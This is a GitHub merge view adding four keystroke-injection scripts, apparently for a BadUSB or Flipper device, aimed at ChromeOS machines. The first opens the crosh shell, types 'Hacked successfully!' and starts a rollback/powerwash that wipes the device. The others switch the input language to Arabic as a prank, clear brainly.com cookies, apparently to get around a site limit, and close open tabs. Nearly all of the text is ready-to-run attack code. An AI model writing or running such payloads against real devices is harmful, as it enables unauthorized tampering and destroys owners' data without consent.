Merge pull request #442 from httpsisbetter/main

Work in progress optimized chomreOS scripts
This commit is contained in:
UberGuidoZ 2023-07-04 22:18:35 -07:00 committed by GitHub
commit 126a227921
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 88 additions and 0 deletions

View File

@ -0,0 +1,29 @@
REM MADE BY HTTPS / https://github.com/httpsisbetter
REM Will commit a update rollback/powerwash
REM Might not work with enterprise enrolled devices
REM Requirement: CHROMEOS
DEFAULTDELAY 100
CTRL W
REPEAT 2
DELAY 2000
TAB
TAB
TAB
ENTER
DELAY 1000
STRING chrome-untrusted://crosh
ENTER
DELAY 3000
STRING Hacked successfully!
ENTER
DELAY 2000
STRING cat > /dev/null << EOF
ENTER
DELAY 500
STRING rollback
DELAY 1000
ENTER
DELAY 1000
STRING Y
DELAY 500
ENTER

View File

@ -0,0 +1,36 @@
REM MADE BY HTTPS / https://github.com/httpsisbetter
REM Changes language in settings to arabic ( It will still have the language input bar in the bottom )
REM Requirements: CHROMEOS
DEFAULTDELAY 100
CTRL W
REPEAT 2
TAB
ENTER
DELAY 500
STRING add input methods
DELAY 1000
ENTER
REM -----
DELAY 3000
ENTER
DELAY 700
STRING arabic
DELAY 500
ENTER
TAB
TAB
ENTER
TAB
TAB
ENTER
REM -----
DELAY 500
SHIFT TAB
DELAY 70
SHIFT TAB
DELAY 70
SHIFT TAB
DELAY 70
ENTER
CTRL W
REPEAT 2

View File

@ -0,0 +1,17 @@
REM MADE BY HTTPS / https://github.com/httpsisbetter
REM Resets brainly.com cookies for you
REM CHROMEOS
DEFAULTDELAY 500
CTRL T
STRING chrome://settings/siteData
ENTER
DELAY 3000
TAB
DELAY 2000
STRING brainly
DELAY 1000
TAB
REPEAT 3
ENTER
DELAY 1000
CTRL W

View File

@ -0,0 +1,6 @@
REM MADE BY HTTPS / https://github.com/httpsisbetter
REM Closes all tabs ( Change the amount of CTRL W you want the more the ctrl W the more tabs it closes )
REM ChromeB
DEFAULTDELAY 100
CTRL W
REPEAT 2